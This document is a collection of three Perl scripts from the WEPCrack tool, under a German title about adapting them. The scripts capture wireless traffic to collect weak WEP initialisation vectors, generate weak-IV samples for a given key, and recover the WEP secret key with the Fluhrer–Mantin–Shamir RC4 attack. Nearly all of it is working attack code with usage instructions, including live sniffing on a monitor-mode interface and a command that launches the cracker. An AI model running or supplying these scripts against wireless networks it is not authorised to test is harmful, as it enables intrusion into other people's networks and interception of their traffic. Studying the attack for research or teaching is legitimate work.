"WEPCrack" - Skripte anpassen

#!/usr/bin/perl
#
# pcap-getIV.pl 
# Anton T. Rager 10/05/2004
#
# script to open pcapfile/device and watch for weak IVs. 
# Creates file "IVFile.log" with captured/processed IVs 
# that match weak criteria. This script replaces the 3+
# yr old prism-getIV.pl script that relied on prismdump 
# and a braindamaged way of processing the prismdump captures.
#
# Use WEPCrack.pl to crack key after collecting 60+ Weak IVs 
# for each keybyte in secret.
#
# Features:
# - auto detects prism2 DLTs and skips prism2 header info
# - 10000 packet status messages with timestamp for progress indication
# - works with interface configured for monitor_mode and libpcap.
# - also works with saved pcap files or saved prismdump files.
#
# Limitations: 
# - assumes all traffic is for same BSSID/WEP encrypted network (try filtering if otherwise)
# - does not discard repeated IVs from multiple/same nodes (again - try filtering on source MAC to prevent)
# - static setting for 40bit WEP


use Net::Pcap;
use Term::ReadKey;

# Non Buffered Output
$|=1;

# -------------------------- Begin Options ---------------------------------------

# Static setting for WEP keysize with this capture
#
$bytesize = 5; # 5 for 40bit 13 for 104bit WEP

# Debug output - print all observed IVs - not just weak ones
#
$debug=0;

# Append to existing logfile
#
$append_log=1;

# number of packets to automatically dump status
#
$statdump=10000;

# threshold for weak IVs and WEPCrack launch - launch manual with "c" command
#
$crack_threshold=60;

# Toggles for differing Weak IVs
# "Magic" IVs follow (x, 255, y) format (from FMS paper) - most reliable 
# for cracking, but requires lots of WEP frames
# Resolved IVs match basic resolved equations (from FMS paper) - less reliable
# for cracking, but occur often
# Dwepcrack IVs match h1kari's 2nd output byte weak IVs 
# (future option - see h1kari's paper)
# 
$magic_iv=1;
$resolved_iv=0;


# Enter a single MAC address (bssid or source address) to limit IV collection 
# to specific network or host. With no filter, all frames are evaluated/recorded
# 
#$filter="000102030405"; # bssid or specific source MAC



# -------------------------- Options End Here ------------------------------------

# Grab and process ARGS

$argflag=0;
if (substr(@ARGV[0],0,1) eq "-") {
 $argflag=1;
} else {
 print("Error: must supply options\n");
 &usage;
}
# -f file
# -i int
# -b bytesize
# -w weak IV types (magic/resolved)
# -F filter
# -n new logfile

while ($argflag eq 1) {
 if (@ARGV[0] eq "-f") { # pcap file
 $file=@ARGV[1];
 shift(@ARGV); # remove option
 shift(@ARGV); # remove value
 } elsif (@ARGV[0] eq "-i") { # pcap interface
 $dev=@ARGV[1];
 shift(@ARGV); # remove option
 shift(@ARGV); # remove value
 } elsif (@ARGV[0] eq "-F") { # MAC to include filter
 $filter=@ARGV[1];
 shift(@ARGV); # remove option
 shift(@ARGV); # remove value
 } elsif (@ARGV[0] eq "-b") { # WEP Bytesize
 if (int(@ARGV[1])) {
 $bytesize=@ARGV[1];
 } else {
 print("bytesize is not an integer, reverting to bytesize of $bytesize\n");
 }
 shift(@ARGV); # remove option
 shift(@ARGV); # remove value
 } elsif (@ARGV[0] eq "-w") { # IV detection types - list with , as delimit
 $magic_iv=0;
 $resolved_iv=0;
 @IV_options=split("\,",@ARGV[1]);
 foreach $IV_list (@IV_options) {
 if ($IV_list eq "magic") {
 $magic_iv=1;
 } elsif ($IV_list eq "resolved") {
 $resolved_iv=1;
 } else {
 print("Invalid IV type $IV_List\n");
 }
 }
 if (!$magic_iv && !$resolved_iv) {
 $magic_iv=1;
 }
 shift(@ARGV); # remove option
 shift(@ARGV); # remove value
 } elsif (@ARGV[0] eq "-n") { # create new logfile
 $append_log=0;
 shift(@ARGV); # remove option
 } elsif (@ARGV[0] eq "-h") { # usage
 &usage;
 }

 
$argflag=0;
if (substr(@ARGV[0],0,1) eq "-") {
 $argflag=1;
}

 
}

#if (!$ARGV[0]) {
# die("Usage: pcap device -- or pcap -f filename\n");
#} elsif ($ARGV[0] eq "-f") {
# $file=@ARGV[1];
#} else {
# $dev=@ARGV[0];
#}
 


# Graceful exit with flush on <ctrl>C
$SIG{INT} = \&sigint_handler;

if ($file) {
 $object=Net::Pcap::open_offline($file,\$err);
 print("Opening pcap file $file.....\n");

 if (!$object) {
 die("Pcap Open Failed for file $file\n");
 }
} else {
 $object=Net::Pcap::open_live($dev,1510, 0, -1, \$err);
 print("Opening device $dev.....\n");

 if (!$object) {
 die("Pcap Open Failed for device $dev\n");
 }

}



$dlt=Net::Pcap::datalink($object);
print("DLT = $dlt: ");

if ($dlt eq 105) {
 print("DLT_IEEE802_11 (0byte Offset)\n");
 $offset=0;
} elsif ($dlt eq 119) {
 print("Prism2 Header (144byte Offset)\n");
 $offset=144;
} else {
 die("unsupported DLT type");
}

print("Assuming WEP key is $bytesize bytes (",$bytesize*8,"bits) long \n");
print("\tthis determines how may keybytes deep to collect weak IVs\n");
print("\tchange bytesize var or IVFile.log header if otherwise\n");
print("\n");
print("Status update at $statdump packets\n");

if ($append_log && -f "IVFile.log") {
 # open for append and assume header is same bitsize
 print("Appending to existing logfile IVFile.log\n");
 open(IVFile, ">>IVFile.log");
 # todo: read existing file and update WeakIV counters
} else {
 # open logfile and create header
 print("Creating new logfile IVFile.log\n");
 open(IVFile, ">IVFile.log");
 # Temp static header for 40/104 WEP - 
 # need to change cracker to try both?
 print(IVFile "$bytesize\n");
}
# populate keycounter array with zero values
for ($x=0;$x<$bytesize;$x++) {
 $keycounter[$x]=0;
}

if ($filter) {
 print("Filtering on source MAC or BSSID of $filter\n");
} else {
 print("No filters - evaluating all detected frames for weak IVs\n\t(mult APs will prob confuse cracker)\n");
}
print("IV Flags: Magic=$magic_iv, Resolved=$resolved_iv\n");

$help = <<EOF;
Interactive Commands:
\th: Flash help
\tf: Flush data to file
\tn: Create new IVFile.log file
\ts: Flash status summary
\td: Toggle debug packet printing (1=All IVs/0=Only Weak IVs)
\tc: Launch WEPCrack process on collected data
\t^c: Exit
EOF

print("Press \'h\' for interactive command help\n");

$start_time=time();

Net::Pcap::loop($object, -1, \&process_packet, $user_data);

print("Exiting and flushing files\n");

sub sigint_handler {
 # snipped from jwright
 if ($object) {
 Net::Pcap::close ($object);
 close(IVFile);
 print("Flushed open files\n");
 exit(0);
 }
}

sub process_packet {
 my ($user_data, $header, $pkt) = @_;
 my($frame_type);
 my ($source_mac);
 my ($dest_mac);
 my ($bssid);
 my ($flags);
 my ($addr_1);
 my ($addr_2);
 my ($addr_3);
 my ($iv_field);
 my ($llc_head);
 my ($onebyte);
 my (@IVList);
 my ($y);
 my ($x);
 #print("packet len ", $header->{caplen}," : ");
 
 $frame_type = ord(substr($pkt, $offset,1));
 
 if ($frame_type == 0x80) { 
 # print packets if verbose flag
 #print("Beacon\n");
 } elsif ($frame_type == 0x08) { 
 $flags=ord(substr($pkt, $offset+1,1)); # extract dec value
 $addr_1=unpack('H*', substr($pkt,$offset+4,6)); # extract hex values
 $addr_2=unpack('H*', substr($pkt,$offset+10,6));# extract hex values
 $addr_3=unpack('H*', substr($pkt,$offset+16,6));# extract hex values
 $llc_head=unpack('H*',substr($pkt,$offset+24,5)); # either WEP IVs or LLC
 
 #print("Data\n");
 
 if (($flags & 0x01) == 0x01) { # to DS
 $bssid=$addr_1;
 $source_mac=$addr_2;
 $dest_mac=$addr_3;
 } elsif (($flags & 0x02) == 0x02) {
 $bssid=$addr_2;
 $source_mac=$addr_3;
 $dest_mac=$addr_1;
 } 
 
 if ($bssid eq $filter || $source_mac eq $filter || !$filter) {
 
 if (($flags & 0x40) == 0x40) { # WEP
 $iv_field=$llc_head;
 $y=0;
 for ($x=0; $x<4; $x++) {
 push(@IVList,substr($iv_field,$y, 2));
 $y=$y+2;
 }
 $onebyte=substr($iv_field,$y,2);
 
 splice(@IVHist,0,1);
 push(@IVHist,hex(substr($iv_field,0, 6)));
 
 $wep_progress_counter++;
 $timestamp=time();
 if ($wep_progress_counter == $statdump) {
 $total_frames = $total_frames + $wep_progress_counter;
 $pkt_ave=int($total_frames/($timestamp-$start_time));
 if ($save_time && $timestamp-$save_time > 0) {
 $int_ave=int($statdump/($timestamp-$save_time));
 } else {
 $int_ave=$pkt_ave;
 }

 print("Timestamp=$timestamp : $total_frames WEP frames seen (tot=$pkt_ave fps, last=$int_ave fps)\n\tWeak IV Keybyte Counters:\n\t");
 for ($x=0;$x<$bytesize;$x++) {
 print(" $x=$keycounter[$x]");
 }
 print("\n");
 $wep_progress_counter=0;
 $save_time=$timestamp;
 }
 
 if ($debug) {
 print("WEP: bssid=$bssid, src=$source_mac IV $IVList[0]:$IVList[1]:$IVList[2] $IVList[3] - $onebyte\n");
 }

 # -- [0] >2 < 16, [1] = 255 (Magic)
 # -- [0]+[1] =1 and [3] <=0x0a or [3] ==0xff (Low Generics?)
 # -- [0]+[1] <=0x0c and [3] >=0xf2 and [3] <=0xfe and and [3] !=0xfd (High Generics)
 
 
 
 if ($magic_iv && hex($IVList[0]) > 2 && (hex($IVList[0])-3) < $bytesize && hex($IVList[1]) eq 255) { 
 $keybyte=(hex($IVList[0])-3); 
 print("write: Magic IV bssid=$bssid source=$source_mac IV=$IVList[0]:$IVList[1]:$IVList[2]\-\>$onebyte (keybyte:",$keybyte ,") \n");
 print(IVFile hex($IVList[0]), " ", hex($IVList[1]), " ", hex($IVList[2]), " ", hex($onebyte),"\n");
 $keycounter[$keybyte]++;
 } elsif ($resolved_iv && ((hex($IVList[0]) + hex($IVList[1]) ) %256 eq 1 && (hex($IVList[2])+2) < $bytesize)) {
 $keybyte=(hex($IVList[2])+2);
 print("Low IV bssid=$bssid source=$source_mac IV=$IVList[0]:$IVList[1]:$IVList[2]\-\>$onebyte (keybyte:", $keybyte, ") \n"); 
 print(IVFile hex($IVList[0]), " ", hex($IVList[1]), " ", hex($IVList[2]), " ", hex($onebyte), "\n");
 $keycounter[$keybyte]++;
 } elsif ($resolved_iv && ((hex($IVList[0]) + hex($IVList[1]) ) %256) eq (254 - hex($IVList[2])) && (254 - hex($IVList[2])) < $bytesize) {
 $keybyte=(254 - hex($IVList[2]));
 print("High IV bssid=$bssid source=$source_mac IV=$IVList[0]:$IVList[1]:$IVList[2]\-\>$onebyte (keybyte:", $keybyte, ") \n"); 
 print(IVFile hex($IVList[0]), " ", hex($IVList[1]), " ", hex($IVList[2]), " ", hex($onebyte), "\n");
 $keycounter[$keybyte]++;
 }
 #print("Bssid: $bssid\n");
 
 
 
 
 
 } else {
 # Check for IP LLC header -- if none, then may be lying firmware. Just note for now.
 if ($llc_head eq "aaaa030000" || $llc_head eq "aaaa190087" || $llc_head eq "aaaa31009c") {
 print("Cleartext\n")
 
 } else {
 print("No WEP flag, but fuzzycheck thinks WEP - you may weant to upgrade your prism firmware ($llc_head)\n");
 # 0xAA - IP LLC
 # 0x42 ?
 # 0xf0 - NetBios
 # 0xE0 - IPX
 
 # $llc_head eq "aaaa190087"
 # $llc_head eq "aaaa31009c"
 }
 }
}
 
 } else {

 }


 ReadMode('cbreak');
 $key = ReadKey(.000001);
 ReadMode('normal');
 if ($key) {

 if ($key eq "h") {
 print("-$help");
 } elsif ($key eq "d") {
 $debug=$debug^1;
 print("-Debug = $debug\n");
 } elsif ($key eq "f") {
 select((select(IVFile), $| =1) [0]);
 print("-Flushed open files\n");
 } elsif ($key eq "n") {
 close(IVFile);
 # open logfile and create header
 print("Creating new logfile IVFile.log\n");
 open(IVFile, ">IVFile.log");
 # Temp static header for 40/104 WEP - 
 # need to change cracker to try both?
 print(IVFile "$bytesize\n");
 
 } elsif ($key eq "s") {
 $timestamp=time();
 
 $total_frames = $total_frames + $wep_progress_counter;
 $pkt_ave=int($total_frames/($timestamp-$start_time));
 print("-Stats: Timestamp=$timestamp : $total_frames WEP frames seen ($pkt_ave fps)\n\tWeak IV Keybyte Counters:\n\t");
 for ($x=0;$x<$bytesize;$x++) {
 print(" $x=$keycounter[$x]");
 }
 print("\n");
 } elsif ($key eq "c" || $key eq "C") {
 $crack_warn=0;
 if ($key eq "c") {
 print("-Checking IV stats\n");
 for ($x=0;$x<$bytesize;$x++) {
 if ($keycounter[$x] < $crack_threshold) {
 $crack_warn=1;
 print("\tWe only have $keycounter[$x] weak IVs for Keybyte $x and threshold is $crack_threshold\n");
 }
 }
 }
 if ($crack_warn=0 || $key eq "C") { 
 Net::Pcap::close ($object); 
 select((select(IVFile), $| =1) [0]);
 print("-Flushed open files\n");
 print("--Calling ./WEPCrack.pl\n\n");
 exec("./WEPCrack.pl");
 } else {
 print("Try \"C\" if you really want to crack with too few weak IVs\n");
 }
 } 
 
 }
}

sub usage {

die("pcap-getIV.pl [-i interface/-f pcapfile] (options)
\t-f pcap filename
\t-i pcap interface
\t-w weak IV type list (\"magic\", \"resolved\" or \"magic,resolved\" for both)
\t-F include source/BSSID filter (hex MAC - ie \"010203ffffff\")
\t-b WEP Bytesize (defaults to 5 - 5=40bit, 13=104bit)
\t-n create new logfile (default is append to existing)
");
}

#!/usr/bin/perl

# basic RC4 keyscheduler and PRGA routine that chooses IVs known to be weak (A+3, N-1, X) and encrypts one byte with key supplied from
# command line. An output file is created in the current directory that contains IVs with a corresponding encrypted byte as well as an
# indicator for secret key size
#
# Choice of the (A+3, N-1, X) keys is based on the paper "Weakness in the Key Scheduling Algorithm of RC4" by
# Scott Fluhrer, Itsik Mantin, and Adi Shamir
#

# By : Anton T. Rager - 08/09/2001-08/12/2001
# a_rager@yahoo.com

$findhost=@ARGV[0];
if (!$findhost) {
 print("Usage: WeakIVGen.pl <Key1:Key2:Key3:Key4:Key5...Keyn>\n\nWhere Keyx is key byte in decimal\nAnd : is delimiter for each byte [40bit=5bytes, 128bit=11bytes]\n");
 exit;
}


$i=0;
$j=0;
$ik=0;
$x=0;

@inkey=split(":", @ARGV[0]);

@IV = (3, 255, 0);

# 802.2 SNAP Header should be 1st plaintext byte of WEP packet
@text = (0xaa);

# Keysize 11 byte or 5 byte
$keysize=scalar(@inkey);
$bitsize=$keysize*8;

print("Keysize = $keysize\[$bitsize bits\]\n");

open(OUTFILE, ">IVFile.log");

print("$keysize\n");
print(OUTFILE "$keysize\n");

$keylen = $keysize+3;

for ($B=0; $B < $keysize; $B++) {
 #print("$B\n");

 

 for ($loop1=0; $loop1 < 256 ; $loop1++) {
 $IV[2]=$loop1;
 # for ($loop2=0; $loop2 < 10; $loop2++) {
 $IV[0]=$B+3;
 # $IV[0]=$loop2;
 for ($i=0; $i < $keylen; $i++) {
 if ($i < 3) {
 $Key[$i]=$IV[$i];
 } else {
 $Key[$i]=$inkey[$i-3];
 }

 }


 $i=0;
 $j=0;
 $ik=0;

 for ($i=0; $i<256; $i++) {
 $S[$i]=$i;
 if ($ik > $keylen-1) {
 $ik=0;
 }
 $Key[$i]=$Key[$ik];
 $ik++;
 }

 for ($i=0; $i<256; $i++) {
 $j=($j+$S[$i]+$Key[$i]) % 256;
 $temp = $S[$i];
 $S[$i] = $S[$j];
 $S[$j] = $temp;
 }

 # 1 byte thru PRGA
 $i=0;
 $j=0;
 $i=($i+1) % 256;
 $j=($j + $S[$i]) % 256;
 $temp=$S[$i];
 $S[$i]=$S[$j];
 $S[$j]=$temp;
 $t=($S[$i]+$S[$j]) % 256;
 $K=$S[$t];
 $encr=$text[0] ^ $K;
 $S3Calc = $text[0] ^ $encr;
 print("$IV[0] $IV[1] $IV[2] $encr\n");
 print(OUTFILE "$IV[0] $IV[1] $IV[2] $encr\n");



 }

}
print("\n");
close(OUTFILE);

#!/usr/bin/perl

# Basic WEP/RC4 crack tool that demonstrates the key scheduling weaknesses 
# described in the paper "Weakness in the Key Scheduling Algorithm of RC4" 
# written by Scott Fluhrer, Itsik Mantin, and Adi Shamir.
#
# script relies on existance of file with list of IVs and 1st encrypted 
# output byte to produce the secret key originally used to encrypt the 
# list of IVs. Scripts WeakIVGen.pl and pcap-getIV.pl are included to
# produce/capture weak IVs and produce the logfile this script expects.
#
# By : Anton T. Rager
# a_rager@yahoo.com
# 08/09/2001-08/12/2001 - initial code to demo FMS attack
# 10/05/2004 - updated original 3yr old code to process generic resolved IVs

$i=0;
$j=0;
$ik=0;
$x=0;


# 802.2 SNAP Header should be 1st plaintext byte of WEP packet
@text = (0xaa);


if (!-f "IVFile.log") {
 die("Error :\nNo IVFile.log file found - run WeakIVGen.pl or pcap-getIV.pl 1st to generate file\n");

}
# Keysize 11 byte or 5 byte
open (IVFILE, "IVFile.log");
@IVList=<IVFILE>;
close (IVFILE);

$keysize=$IVList[0]; 
chomp($keysize);
splice(@IVList, 0, 1);

$bitsize=$keysize*8;
print("Keysize = $keysize \[$bitsize bits\]\n");


for ($B=0; $B < $keysize; $B++) {

 # Init statistics array
 for ($i=0; $i < 256; $i++) {
 $stat[$i]=0;
 }

 foreach $IVRec (@IVList) {

 @IV=split(" ",$IVRec);
 $key[0]=$IV[0];
 $key[1]=$IV[1];
 $key[2]=$IV[2];
 $encr=$IV[3];

# if ($key[0] eq $B+3) {




# Look for matching IV for 1st Key byte

 $i=0;
 $j=0;
 $ik=0;

 for ($i=0; $i<256; $i++) {
 $S[$i]=$i;

 }

 # 0 to 3+K[b]
 for ($i=0; $i< $B + 3; $i++) {
 $j=($j+$S[$i]+$key[$i]) % 256;
 $temp = $S[$i];
 $S[$i] = $S[$j];
 $S[$j] = $temp;
 if ($i eq 1) {
 $S1[0]=$S[0]; 
 $S1[1]=$S[1];
 }
 
 }


 $X=$S[1];
 if ($X < $B + 3) {
 if ($X+$S[$X] eq $B + 3) {
 if ($S[0] ne $S1[0] || $S[1] ne $S1[1]) {
 #print("Throwaway IV $IV[0], $IV[1], $IV[2]\n");
 }

# Xor inbyte and outbyte to get S[3]
# plugin S[3] as J and subtract (5+x+S[3]) to get K
 $S3Calc = $encr ^ $text[0];
 $leaker = $S3Calc-$j-$S[$i] %256;
 $stat[$leaker]++;
 }
 }
 


 $max=0;
 $count=0;
 foreach $rank (@stat) {
 if ($rank > $max) {
 $max=$rank;
 $winner=$count;
 }
 $count++;
 }
#}
}
print("$winner ");
push (@key, $winner);

}
print("\n");